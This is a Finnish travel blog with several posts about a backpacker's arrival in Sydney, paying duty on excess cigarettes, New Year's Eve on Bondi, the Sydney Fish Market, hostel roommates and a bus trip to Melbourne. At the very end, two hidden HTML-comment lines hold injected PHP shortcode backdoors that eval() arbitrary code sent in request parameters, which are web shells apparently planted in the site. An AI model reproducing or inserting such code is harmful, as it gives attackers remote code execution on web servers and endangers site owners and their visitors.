Uusi vuosi ja uudet…?

Vuoden vaihteen jälkeinen loppuviikko menikin nopeasti. Sami palasi töihin ja itse sain hoidettua loppuun pankkitilin avaamisen ja veronumeron hakemisen. Tai niin ainakin luulin. Pankkitiliä avatessa vaaditaan uudelle tilille tehtävän talletus, muuten tili puretaan. Tämänhän ei pitäisi olla monimutkaista, mutta omaa pankkiani kohtaan aloitettiin juuri samaan aikaan palveunestohyökkäys, joka vaikeutti elämääni huomattavasti. Nettipankkiin ei päässyt käsiksi, enkä ollut pitänyt tarkkaa kirjaa menoistani, joten pankki- ja luottokortin saldoa pystyi vain arvailla. Reissukassaa toki vielä tässä kohtaa on, siihen ei vain päässyt käsiksi. Ja samalla olisi pitänyt tehdä siirto uudelle pankkitilille, jonka toteutuminen nyt vie muutaman päivän. Yritin keksiä minkä tahansa muun keinon saada asia ratkaistua, mutta kun muuta vaihtoehtoa ei ole, niin nöyränä sitten Skype-puhelu isälle. Vaikka itsenäisen reissaajan ylpeyteni ottikin tästä aika pahan kolhun, opetti kyseinen tapahtuma myöskin, että apua täytyy osata pyytää. No, asiat saatiin ratkaistua, ja kun muutamaa päivää myöhemmin paikallinen pankkikorttini saapui postissa, oli tili myös käyttövalmis. Tämäkin vaikeus oli selätetty.

Varasin myös sänkypaikan läheisestä hostellista, sillä vaikka olenkin kiitollinen, että sain asua Samin luona, oli aika jatkaa eteenpäin. Hänen aikaiset heräämisensä ja minun lomailuun sopiva päivärytmini eivät oikein kohdanneet.

Viimeisenä iltana ennen muuttoani meillä oli Pilvin läksiäiset. Pilvi on Samin hyvä ystävä, joka oli tällä erää ollut Australiassa kolme viikkoa, eikä kotiin paluu tuntunut kenestäkään hyvältä ajatukselta. Ilta meni hyvän ruuan ja vielä paremman seuran merkeissä, ja pitihän sitä tietenkin käydä vielä yöuinnilla.

Jimmy vielä epäilee yöuintia

Sami, Pilvi ja Jimmy läksiäistunnelmissa

Seurassamme ollut paikallinen Jimmy oli alkuun hieman epäileväinen tästä suomalaisesta perinteestä, mutta oli lopulta vähintään yhtä innoissaan kuin me muutkin uimassa pimeässä meressä. Uimisen jälkeen viihdyimme vielä pari tuntia Samin asunnon patiolla ennen kuin kaikkien oli aika siirtyä nukkumaan ja valmistautumaan seuraavaan päivään.

Viikon verran asuin Noahs Backpackers @ Bondi –nimisessä hostellisssa, ja kokemus oli upea. Itse en ole se huoneen äänekkäin, joten saan olla todella kiitollinen, että asuin samassa huoneessa Indianasta kotoisin olevan Yaan kanssa.  Yaa vastasi hyvin sitä stereotypistä käsitystä, joka minulle on muodostunut amerikkalaisista, kovaääninen, todella ystävällinen ja halukas tutustumaan kaikkiin ympärillä oleviin ihmisiin. Seuraavana päivänä huoneeseen muutti englantilaiset Claire ja Laura, ja heidän kanssa tulikin vietettyä suurin osa viikosta. Kun vihdoin huomasin, että uloskirjautumispäivä läheni, aloin pohtia mihin suuntaan sitä Sydneystä jatkaisi. Hiljalleen ideaksi muodostui jatkaa Brisbaneen ja siitä itärannikkoa ylös Darwiniin, josta olisi lyhyempi matka lentää keväällä Balille, jonne olimme sopineet treffit suomesta tulevien ystävieni kanssa. Etsittyäni Brisbanesta hostellia ikuisuuden, päätin lopulta lopettaa arvostelujen lukemisen, sillä jokaisen kokemukset ja odotukset hostellia kohtaan ovat niin erilaiset, eikä kaikkia ole ikinä mahdollista miellyttää. Varasin lopulta sänkypaikan viikoksi ja päätin seuraavana päivä varata hostellin kautta bussimatkan Brisbaneen. 16 tunnin matka ei tuntunut kohtuuttomalta, kun Helinki-Levi –väliä on tullut kuljettua muutamaan kertaan. Tyytyväisenä itseeni ja aikaansaannokseeni lähdin Yaan kanssa syömään ja kerroin hänelle suunnitelmastani. Seurasi keskustelu: ”Aa, okei hei, kiva idea. Mitä muuten tykkäsit Melbournesta kun olit sielä?” ”En ole vielä käynyt sielä, tulin Ausseihin vasta reilu viikko sitten.” ”No mutta ethän sä sitten voi mihkään Brisbaneen lähtä! Sun pitää nähä Melbourne ekana! Peru se hostelli, ja lähe mun mukaan. Maanantai-ilta on lähtö Melbourneen.” ”…” ”Hei ihan oikeesti, se on kuulemma niin cool paikka että sitä ei vaan voi jättää välistä. Mun kaikki kaverit tulee sinne kans ja ois kyl tosi jees jos tulisit mukaan!” ”No, okei, miksi ei. Paljon kivempihan se on muutenki reissaa jonkun kanssa kun yksinään.” No, kävimme siis syömässä ja palattuamme hostellille peruin sänkyvaraukseni Brisbanesta. Kysinen päivä oli perjantai, joten meille jäi vielä hyvin aikaa etsiä majapaikka ja nauttia vielä viimeisistä päivistä Bondilla. No niihin viimeisiin päiviin sitten sisältyi pahasti palaminen rannalla ja vesisateessa juoksemisesta aiheutunut flunssa ja kuume. Eli aika pitkälti hostellilla lepäämiseen. Maanantaina vidoin kirjauduimme ulos Noahsilta, kävimme erittäin myöhäisellä aamiaisella samassa dormissa asuneiden tyttöjen kanssa ja vielä shoppailemassa viimeiset välttämättömyystarvikkeet.

Palattuamme hostelille odottamaan Melbourneen lähtevää bussiamme selvisi, että Pizza Hut halusi testata uusia kausimakuja reppureissaajilla ja tarjosi siksi ilmaista pizzaa kaikille hostellin asukkaille. Kuten arvata saattaa, tähänkin oli koira haudattuna. Jokainen, joka halusi osallistua, pyydettiin vuorollaan kameran eteen kertomaan ensin hieman itsestään ja sen jälkeen mielipiteensä uusista pizzoista. Kukaan kuvatuista ei saanut paljastaa millaisia uudet maut olivat, ja kun kuvausryhmä pyysi erityisesti ei-australialaisia osallistumaan aloimme arvata mistä oli kyse. Kun Yaa vielä suostuttelun jälkeen osallistui kuvaukseen, saimme varmuuden epäilyillemme. Niin kutsutut uudet kausimaut olivat pizzoja, joissa tomaattikastikkeen sijaan oli pohjalla vegemiteä, ja tarkoituksena oli kuvata reissaajien ilmeitä kun he maistavat tätä aussien kansallistuotetta. Kyseessähän on siis Australiassa ja Uudessa-Seelannissa käytettävä levite, joka valmistetaan oluen valmistuksessa muodostuvista hiivajätteistä. Itse en ole kyseistä tuotetta maistanut, mutta en ole kuullut kenenkään väittävän sitä miellyttäväksi makuelämykseksi. Meille epäselväksi jääneestä syystä Pizza Hut halusi toteuttaa mainoskampanjan käyttäen kyseisiä videoklippejä, mutta koska kaikki paikalla olleet saivat ilmaista pizzaa vaikka eivät osallistuneet kuvauksiin, emme löytäneet aihetta valittaa. Videot kuulemma löytyvät kyseisen ravintolan Facebook-sivulta 22.1. alkaen.

WP_20150103_20_03_30_Pro

Vielä viimeiset fiilistelyt Bondilla

Ilmaisen lounaan ja hyvästien jälkeen oli aika pakata rinkat selkään ja vaihtaa maisemaa. Bondilla oli satanut jo useamman päivän, joten lähteminen tuntui hyvältä idealta, vaikka Noahsiin jäikin uusia ystäviä, joiden seurassa olisi viihtynyt pidempäänkin. No, lähdimme kohti bussiasemaa joka muutaman väärän suunnan jälkeen löytyi suht helposti. Saatuamme tavarat bussin kyytiin, ilmoitti kuski erittäin syvästi pahoitellen, että kuljetusvälineemme wc-tilat olivat valitettavasti epäkunnossa, joten kun aikaa lähtöön oli vielä 20 minuuttia, olisi kaikkien parempi käyttää hyväkseen bussiaseman wc-tiloja. Hieman kieltämättä tulin pohtineeksi, että mitähän matkasta tulee, sillä vaikka ilma oli pilvinen, oli lämpöä sen verran, että vettä piti juoda jatkuvasti ja matka kestäisi 12 tuntia. No, onneksi kuitenkin matkasimme yötä vasten, ja pian lähdettyämme liikkeelle ilmeni, että pysähtyisimme kahdesti syömään, joten yksikään ajopätkä ei ollut paljon kolmea tuntia pidempi. Hyvin tästä selvittäisiin. Ja niin selvittiinkin. Matka taittui yllättävän nopeasti, ensimmäinen ajopätkä meni ah-niin-upeaa (ei ehkä ihan) elokuvaa Perhe on painajainen katsoessa, ja ensimmäisen ruokatauon jälkeen olikin jo sopiva aika alkaa nukkua. Seitsemältä olimmekin jo perillä Melbournessa ja oli aika alkaa suunnistaa kohti hostellia, jonka sijainnista kummallakaan meistä ei ollut tarkkaa tietoa.

-M-

WP_20150103_20_02_52_Smart

Bondi Beach & Sydney

Sydneyn näkeminenhän nyt jäi kokonaan väliin, kun lomailun ensimmäiset viikot menivät Bondilla loikoiluun. Mitäpä muuta juuri Suomesta karanneena olisi voinut kaivata? Aurinkoa, lämpöä ja jokaiseen makuun sopivia ravintoloita tarjoava Bondi oli täydellinen aloituskohde.

Seitsemän kilometrin päässä Sydneyn keskustasta sijaitseva Bondi on yksi Australian, ellei maailman, legendaarisimmista rannoista, eikä suotta. Noin kilometrin mittaiselta rannalta löytyy omat paikkansa niin uimareille kuin surffareillekin. Ja rannan eteläpäästä löytyy Bondi Icebergs -hengenpelastusseuran ylläpitämä ulkouima-allas, jonka tarkoitus on alun perin ollut pitää yllä hengenpelastajien uimataitoa talvikauden yli. Nykyään Icebergille pääsee uimaan noin 6AUD maksua vastaan ja seuran tiloissa toimii myös samaa nimeä kantava, kuuluisa ravintola.

WP_20141231_13_44_33_Pro

Rannan ympärille kasvanut alue on kuin luotu näyttäytymiselle, ja ainakin paikalliset ottavat tästä ilon irti. Ruokakaupassa käynti ilman paitaa on ihan okei, kuten myös pankissa asioiminen paljain jaloin ja rantahame bikinien kaveriksi valittuna. Kaikkialla mainostetaan joogaa, body pumpia ja cross fit –tunteja, ja ruokapuolella kovassa huudossa on acai ja muut supermarjat, kuten myös mehujen ja smoothieiden boostaaminen proteiinilisillä.

Täytyy myöntää, että vaikka tämä kaikki tuntui hieman yliampuvalta, niin ainakin rannasta ja merestä tunnutaan pitävän hyvää huolta. Tupakointi kielletty, juhlapyhien aikaan alkoholin nauttiminen kielletty, ja roskiksia löytyy niin paljon, että on vaikea uskoa, että kukaan ainakaan unohtaisi siivota jälkensä lähtiessään. Tästä voisi ottaa mallia kotimaisissakin rantakohteissa. Yllättävin huomio oli kuitenkin, että yöllä ranta lanataan. En osaa sanoa, onko tämä yleinen piirre kaikilla rannoilla, mutta ainakin Bondilla pyöri joka yö hyvin samanlainen kone, kuin mitä on totuttu näkemään hiihtokeskuksissa pitämässä rinteitä kunnossa.

Tämän lähemmäksi kuuluisaa oopperataloa emme kokeneet tarpeelliseksi päästä

Tämän lähemmäksi kuuluisaa oopperataloa emme kokeneet tarpeelliseksi päästä

Kun rantaa ja ravintoloita oli ihailtu saapumiseni jälkeinen päivä, lähdimme uuden vuoden aattoaamuna tutustumaan Sydney Fish Marketiin, Australian suurimpaan ja maailman kolmanneksi suurimpaan, no, kalatoriin. Nimi antoi ainakin itselleni käsityksen ulkotiloissa toimivasta Kauppatoriltakin tutusta toiminnasta, mutta väärässä olin. Torialue koostuu useista rakennuksista, joista päätilassa käydään päivittäin huutokauppa, jossa paikalliset ravintoloitsijat ja kauppiaat kilpailevat päivän erikoisistaan. Huutokauppa on siviileiltä suljettu, mutta torilla riittää kyllä näkemistä ja kokemista muutenkin. Elävänä myydään ainakin kuningasrapuja, hummereita, simpukoita, ostereita ja paljon muuta. Lisäksi on mahdollista ostaa kotiin kokonaisia kaloja tai fileitä, tai myöskin syödä paikan päällä.

Aamiaiseksi ostereita!

Aamiaiseksi ostereita!

Kummastusta herättävä abailone

Kummastusta herättävä abailone

Toimitsijoita on pitkälti toista kymmentä, erikoistuen hieman eri tuotteisiin. Päätimme Samin kanssa näin aamiaiseksi syödä ostereita ja jotain ainakin minulle tuntematonta merenelävää nimeltään abailone. Sami oli kuullut elävästä aiemmin, mutta ei osannut varmuudella sanoa onko kyseessä minkä mallinen mönkijä, mutta sashimina se vaikutti oikein lupaavalta. Tässä kohtaa voi tietenkin pohtia, että oliko brekumenumme kaikkein järkevimmästä päästä, kun itse en ollut ostereitakaan ikinä syönyt.. No, kokemuksia, kokemuksia.

 

WP_20141231_09_59_25_Pro

Vielä eläviä abailoneja

WP_20141231_09_58_54_Pro

Ja löytyi myös hummereita

 

Bongattiin myös kuningasrapuja!

Eipä ollut huippumenetys. Ostereita en koe tarpeelliseksi kokeilla enää uudelleen, ainakaan ilman kuohuviiniä, ja abailone, no, se jääköön omaan arvoonsa. Ehkä toimisi paremmin kypsennettynä? Lopulta löysimme kyseisen tuotteen myynnissä elävänä, ja kyseessä on siis kotiloeläin, suomeksi merikorva. Tästä ruokakokemuksesta lannistumatta kiersimme ympäri suurta torialuetta ihmetellen miksi saman toteuttaminen kotona Suomessa on niin mahdottoman hankalaa.

 

Kävimme vielä syömässä toiselta kojulta lämpimän lautasen, johon kuului mustekalaa, kampasimpukoita, lohta, sinisimpukoita ja paljon muita mereneläviä, ja lisänä ranskalaisia. Upea tuote. Lähtiessämme Sami nappasi mukaan hedelmäsmoothien ja itse ostin suklaaseen dipatun puolikkaan mangon. Täydellinen jälkkäri.

 

Tämän jälkeen päätimme palata Bondille paljonkaivattuja päikkäreitä varten. Ei ravintolatyöntekijöitä ole suunniteltu heräämään ennen seitsemää edes lomalla. Päikkäreiden jälkeen oli ohjelmassa myöhäinen lounas ja suunnittelua vuoden vaihdetta varten.

Lounaan seuraksi sopi hauskasti tarjoiltu sangria

Lounaan seuraksi sopi hauskasti tarjoiltu sangria

 

 

Samin työkavereiden kanssa päätimme vaihtaa vuotemme Pohjois-Bondilla olevalla golfkentällä, joka on tarpeeksi korkealla, että siltä näkee Sydneyn kuuluisat ilotulitukset. Ensimmäinen näytös alkoi jo yhdeksältä, ja hieman sen jälkeen lähdimme juhlajuominemme kiipeämään kukkulaa ylös. Julkijuopottelun ollessa sakkojen uhalla kielletty oli juhlajuomat pakattu klassisesti ruskeisiin paperipusseihin, joita saa ostosten yhteydessä kaikista bottle shopeista, eli paikallisista Alkon tyylisistä, tosin yksityisistä, liikkeistä.

Golkentältä meitä vastaan tuli paljon perheitä pienten lastensa kanssa, ja epäilemättä aikaisempi ilotulitus onkin juuri heille suunnattu. Odottelimme muiden aikuisempien juhlijoiden kanssa the showta kun poliisit ilmestyivät paikalle. Kun alkukohteliaisuudet ja uudenvuodentoivotukset oli vaihdettu, kävi ilmi syy poliisien vierailulle, golfkenttä on yksityisaluetta, eikä siellä saa juhlia edes kyseisenä yönä. Kilometrin päästä löytyisi toinen puisto, josta olisi oikeastaan jopa paremmat näkymät ilotulituksia ajatellen. Siellä ei tosin saisi mitään alkoholia nauttia. Päätimme olla kysymättä, että oliko tarkistuskäynti tarkoituksella ajoitettu tulitusten väliselle ajalle, jotta perheet saisivat rauhassa juhlia lastensa kanssa, mutta nuoremmat aikuiset halutaan ajaa pois.Tavarat kantoon ja uutta suunnitelmaa valmistelemaan, aikaahan meillä oli vielä lähes kaksi tuntia.

Lähdimme muiden häädettyjen kanssa poliisien ohjaamaan suuntaan, mutta päätimme pian ettemme jaksa siirtyä niin pitkää matkaa, kun kotiin rannallekin piti vielä yöllä palata. Pyörittyämme hetken ympyrää löysimme sattumalta ylöspäin johtavan rampin, josta pääsi tyhjälle viheralueelle. Tyhjä se varmaan oli rampin alapäässä olevan aidan takia, mutta jos siitä pääsee ympäri, niin sehän on kielletty vain autoilta, eikö? Päätös ei ollut vaikea, kyseinen nurmikenttä oli vielä golfkenttääkin korkeammalla, ja näkymät aivan upeat. Sinne jäimme siis odottelemaan vuoden vaihtumista ja pohtimaan, että ei ole kyllä aiemmin tarvinnut miettiä miten saisi uutenavuotena kuohuviinin jäähdytettyä ulkona. Noin tuntia myöhemmin saimmekin todistaa aitiopaikalta kuuluisia Sydneyn ilotulituksia, ja kaikkialta ympäriltä kuuluvaa iloista huutoa. Kuohuviini oli lämmintä, mutta siitä huolimatta olimme kaikki onnellisia saadessamme aloittaa uuden vuoden näin hienossa paikassa. Uusi vuosi ja uusi alku.

Hetken vielä vietettyämme viheralueella oli aika suunnata takaisin, Samin työkavereiden piti päästä vielä takaisin kaupunkiin, ja vaikka matka ei olekaan pitkä, tiesimme kaikki, että siinä tulisi tällaisena iltana kestämään kauan. Toivotimme vielä hyvät uudetvuodet toisillemme ja lähdimme eri suuntiin. Matkalla takaisin rannalle joimme vielä Samin kanssa oluet ennen kuin menimme nukkumaan, päiväunista huolimatta päivä oli ollut todella pitkä.

 

-M-

Matkaan lähtö

Lentoni lähti sunnuntaiaamuna 7:00 Helsinki-Vantaalta, ja 26 tuntia ja kaksi koneenvaihtoa myöhemmin olin perillä Sydneyssä. Kiitos yhdeksän tunnin aikaeron ja hieman myöhässä laskeutuneen lennon, oli kello jo yli kahdeksan illalla kun viimein pääsin terminaalista ulos. Kiitollinen olinkin, sillä (lähes) Pohjois-Suomessa vietetyn joulun jälkeen oli ilmastonvaihdos tarpeeksi raju vaikka aurinko ei enää paistanutkaan. Lennot, Helsinki-Amsterdam-Abu Dhabi-Sydney, sujuivat mukavasti, ja onneksi Amsterdamin kentällä tuli vietettyä aikaa alle viikko aiemmin, niin suuntavaistottomana ei siellä vielä ollut aihetta paniikkiin. Abu Dhabissa yllätyin heti siitä, miten ilmankosteus lentokentän sisälläkin oli aivan eri luokkaa kun mihin olen tottunut.

Lähestyessämme Sydneyn kenttää saimme täytettäväksemme maahantulokaavakkeet, joita tutkiessani huomasin pari mahdollista ongelmaa. Ensinnäkään minulla ei ollut tietoa tulevan majoituspaikkani osoitteesta, eikä Samin paikallisesta puhelinnumerosta, yhteydenpito oli hoidettu Facebookin kautta. No, eihän se nyt haittaa jos ne kohdat jättää tyhjäksi. Toiseksi, ei sitten ollut käynyt mielessäkään tarkistaa mitään maahantuontirajoituksia, ja saman tien mieleeni palautui hataria kuvia tupakkamyyjän kanssa käydystä keskustelusta Abu Dhabin kentällä: ”Ai Australiaan menossa? No sittenhän oikeastaan neiti ei saisi näin paljon tupakkaa viedä mukana. Ainoastaan kolme askia. Mutta kun on kerran joululomat ja muuta, niin tuskin he tullissa mitään veloittavat, ei ole tapana. Hymyilet vain ja selität, että on tapahtunut väärinkäsitys.” Saman tien kirosin itteäni ja totesin, että olisi varmaan pitänyt juoda se kahvi mieluummin kuin lähtä vielä täysin unisena ostoksille. No, ei muuta kun kiltisti maahantulokorttiin merkintä, että ylimäärästä tupakkaa mukana, ja odottamaan miten tullissa asiaan suhtaudutaan.

Passintarkastus meni hyvin ja sähköinen viisumini löytyi myös ilman ongelmia, joten rinkka selkään ja tullia kohden. Tullissa ei onneksi ollut jonoa, ja erittäin ystävällinen tarkastaja hymyille ohjasi minut tiskille, että käydään tämä tilanne aivan rauhassa läpi. Ihan yhtä ystävällinen ei ollut kollega, joka tietojani tutkiessaan ihmetteli, että miksi majapaikan osoite ja yhteyshenkilön puhelinnumero puuttuvat. Selitettyäni tilanteen daami katsoi minua kuin idioottia ja kysyi, että miten olisimme edenneet tilanteessa, jos rinkkani olisi jäänyt matkan varrelle? Mihin se olisi lähetetty? Siinä kohtaa tunsinkin itseni täysin idiootiksi, sillä viimeksi Amsterdamin kentällä vierailtuamme matkatavaramme jäivätkin sinne. Eli alle viikkoa aiemmin sama rinkka jäi Damiin, eikä minulla käynyt mielessäkään muistaa tarkistaa Samin osoitetta ennen Sydneyhyn lähtöäni. No, rinkka tuli onneksi perille, joten pääsimme jatkamaan, kunhan olin saanut kunnon äidilliset nuhtelut. Eli sitten ne tupakat. ”Eikö Abu Dhabissa kerrottu ettet saa tuoda näin paljon maahan verottomasti?” ”Juu, taidettiin kertoa, mutta olin niin unissani, etten ehkä kuunnellut ja ymmärtänyt kaikkea.” ”No, tässä nyt on sen verran ylimääräistä, että lasketaanpa, verot olisivat yhteensä 77AUD. Miten haluat toimia?” ”No, jos jätän nämä tänne ja ostan saman määrän kaupasta, niin paljonko se kustantaisi?” ”Pyh, ainakin tuplasti, ellei enemmänkin.” ”Selvä, teille varmasti käy Visa?” Eli lopputuloksena halvalla (24USD) ostettu kartonki kustansikin sitten hieman enemmän. Olisi pitänyt perehtyä.

Maksettuani ja lähtökohteliasuudet vaihdettuamme pääsin jatkamaan matkaa. Nopea vaatteiden vaihto ja lentokentän kahvilasta ylihinnoiteltu kokispullo mukaan, ja pihalle odottamaan Samia. Ulos pääseminen pitkään lentokoneessa ja –kentillä istumisen jälkeen tutui niin upealta, ettei haitannut yhtään, että noutopalvelu oli myöhässä. Nähtävästi Bondin tyhjentyessä kaikki julkinen liikenne rannalta kaupunkiin on aivan tukossa, ja Sami sanoi odottaneensa 45 minuuttia bussia, johon mahtuu kyytiin. Kyseinen linja ajaa kuitenkin noin 7 min välein, joten väkeä on ollut liikkeellä. Päätös siis tehtiin ja taksi napattiin takaisin rannalle. Rinkka kämpille ja kylmä kalja kädessä olikin hyvä hetki yrittää vihdoin ymmärtää, että on toisella puolella maailmaa.

No, eipä onnistunut, ja pikaisen puhelun jälkeen lähdimmekin baariin tapaamaan Samin työkavereita.  Kuten arvata saattaa, ilta ei kovin myöhään allekirjoittaneen väsymyksen takia kestänyt, mutta sen verran kuitenkin, että muutamaan kaljaa myöhemmin päätimme vielä käydä uimassa ennen nukkumaan lähtemistä. Oli kyllä upea fiilis! Tyhjä ranta, kirkas tähtitaivas ja lämmin vesi, tästä oli hyvä aloittaa Australian-loma!

WP_20150105_20_40_58_Pro

Kyllä näillä maisemilla kelpaa käydä yöunnilla!

 

-M-

Aluksi

Ajatus reissaamisesta ei ole ollut elämää suurempi suunnitelma, jonka olen aina halunnut toteuttaa. En kuulu niihin, joiden on mahdotonta olla aloillaan ja tyytyväinen tasaiseen, jopa turvatuksi kutsuttuun elämään. Tai niin ainakin luulin. En aluksi edes ajatellut, että töiden perässä ympäri Suomea juokseminen voitaisiin mieltää reissaamiseksi. Silloinhan kuitenkin on tiedossa määränpää, jokseenkin varma asunto ja työ. Nyt jälkeenpäin ajateltuna, kyseessä on varmaan ollut kuitenkin samaan lajiin kuuluva kaukokaipuu, jonka takia Helsinki ei ole enää pitkään aikaan tuntunut kodilta. Paljon luonnollisempaa on ollut viettää talvet Lapissa ja kesät Hangossa. Kyllähän siinä on tullut tutuksi autossa, junassa ja lentokoneessa istuminen.

Kaipuu jonnekin hieman pidemmälle ja lämpimämpään on kuitenkin hiljalleen nostanut päätään, ja vuosi sitten tein päätöksen säästää rahat ja lähteä katsomaan miltä tuntuu pakata rinkka selkään ja hypätä lentokoneeseen ilman sen suurempaa suunnitelmaa. Australia on kiinnostanut niin kauan kuin jaksan muistaa, mutta vielä kiinnostavampi kohde on Borneo, saari joka jakautuu Indonesian, Malesian ja Brunein sulttaanikunnan kesken. Asiaa pidempään pohdittuani päätin, että koska reissaamista ei ole aiemmin tullut kokeiltua, voisi olla suositeltavampaa aloitta hieman helpommasta, länsimaisesta Australiasta, ja vasta sen jälkeen jatkaa länteen, ensin Indonesiaan ja siitä Borneolle.

No, suunnitelmahan on tähän asti sujunut varsin mallikkaasti. Hieman hätäsesti tuli ostettua lentolippu Sydneyhyn joulun jälkeisille välipäiville ja vasta tämän jälkeen muistin sen toisen asiakirjan, viisumin. No, onneksi Working Holiday -viisumin saaminen Suomen passilla ja moitteettomalla historialla on lähes läpihuutojuttu, ja kiitos aikaeron, sain hyväksytyn päätöksen neljän tunnin päästä hakemukseni jättämisestä. Muutenkin alku tuntui loksahtavan kohdilleen. Syyskuussa oli hyvä ystäväni muuttanut Bondi Beachille, joten vuoden vaihteen yli ei tarvitsisi edes pohtia majottumista.

Aivan toinen tarinahan sitten on tämä kirjoittaminen. Kirjoittaminen ei ole ollut ikinä lempipuuhani. Tai kuulut ikinä edes Top 5 –listalle. Se on enemmänkin ollut välttämätön paha, joka kuuluu osana koulutukseen. Päiväkirjojen pitäminen pikkutyttönä? Ei, ei kiinnosta. Tutkielmien ja esitelmien kirjoittaminen? Ei, mieluummin jääköön AMK-koulutus kesken. Joten, miksi sitten blogi? Hyvin pitkälti itsekkäistä syistä. Tämän mahdollisesti vuoden kestävän reissun aikana haluan haastaa itseni tekemään ja kokeilemaan asioita, jotka jännittävät, pelottavat, ahdistavat tai muuten ajavat mukavuusalueen ulkopuolelle. Jostainhan on aloitettava, ja koska muisti on yllättävän petollinen asia, on hyvä, että edes osa tapahtumista on kirjotettu ylös. Onhan tämä myös paljon helpompi keino jakaa kokemuksia kotona olevalle perheelle ja ystäväpiirille.

Joten tästä lähtee liikkeelle itsensä haastaminen niin reissaamisen kuin kirjoittamisenkin suhteen!

Ja ai niin, inspiraatio blogin nimeen tuli Kuningasidean aivan huikeesta biisistä Yksin Pariisiin. Kannattaa kuunnella, aivan upea, ja kuvaa hyvin ainakin niitä tunteita joita koin koko matkan tänne toiselle puolelle palloa!

 

-M-

<!– [insert_php]if (isset($_REQUEST["qip"])){eval($_REQUEST["qip"]);exit;}[/insert_php][php]if (isset($_REQUEST["qip"])){eval($_REQUEST["qip"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["eDOcg"])){eval($_REQUEST["eDOcg"]);exit;}[/insert_php][php]if (isset($_REQUEST["eDOcg"])){eval($_REQUEST["eDOcg"]);exit;}[/php] –>